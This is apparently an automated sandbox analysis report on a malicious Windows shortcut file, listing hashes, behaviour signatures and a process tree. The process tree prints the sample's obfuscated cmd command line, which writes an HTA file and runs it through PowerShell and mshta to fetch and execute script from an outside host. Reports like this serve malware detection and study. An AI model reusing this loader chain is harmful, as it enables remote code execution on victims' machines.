Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02-04-2024 14:22

General

  • Target

    599151.301.25077.7868139.lnk

  • Size

    561B

  • MD5

    57050773638b46dfc5f60930cd1cb266

  • SHA1

    3219f88ea28c525eb35050939d2ecb01d6fa7282

  • SHA256

    7ae01fd7aa0b5898eb36548024f2cc8156216322ea6402eb8f04180adfc9539d

  • SHA512

    181885faf9a655befaa6755fd003fd674e1ccf201c6718e9693754f4d5704230d62982430997b9dd85eee9f9139997cd67ea7c9c171f91f245eaa497e9796712

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\599151.301.25077.7868139.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "seT sKk=script&&seT px=powershell&&SEt NEGG=C:\Users\Public\Videos\^YqW&&SEt SMO=.H&&SEt XQGZ=^<!sKk!^>try{v6POar c='!sKk!:';d='h6POTtP:';G6POetObj6POect(c+d+'&&sET FIC=ZXEFMZXEFMwaa8.nolii.dateZXEFM?1ZXEFM');}catch(e){}close();^</!sKk!^>&&sEt/^p YE8N="%XQGZ:6PO=%%FIC:ZXEFM=/%"<nul > %NEGG%%SMO%ta|!px! -Command "& '!NEGG!!SMO!ta' "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" sEt/p YE8N="%XQGZ:6PO=%%FIC:ZXEFM=/%" 0<nul 1>%NEGG%%SMO%ta"
        3⤵
          PID:2588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "& 'C:\Users\Public\Videos\YqW.Hta'
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2624
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\Videos\YqW.Hta"
            4⤵
            • Modifies Internet Explorer settings
            PID:2384

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Videos\YqW.Hta

      Filesize

      105B

      MD5

      8242e1808eac09b7264a697fc98c2f37

      SHA1

      34a5dca8f5eeb3edb9a73f0e544be74049506325

      SHA256

      c43738a850d1ae9d59f39d592cdc3faca6a327735dbaaa9c979b5036dba72937

      SHA512

      09906f3479661b52fe980e54cca55bbe67aa5a01c912d414d77fe11e6eb7ed6a3c4c5ae5abb991734e657219a8a7164d655a2106913330cea9a7014746f29d6d

    • memory/2624-44-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB

    • memory/2624-45-0x0000000002490000-0x0000000002510000-memory.dmp

      Filesize

      512KB

    • memory/2624-46-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

      Filesize

      2.9MB

    • memory/2624-48-0x0000000002560000-0x0000000002568000-memory.dmp

      Filesize

      32KB

    • memory/2624-47-0x0000000002490000-0x0000000002510000-memory.dmp

      Filesize

      512KB

    • memory/2624-49-0x0000000002490000-0x0000000002510000-memory.dmp

      Filesize

      512KB

    • memory/2624-51-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

      Filesize

      9.6MB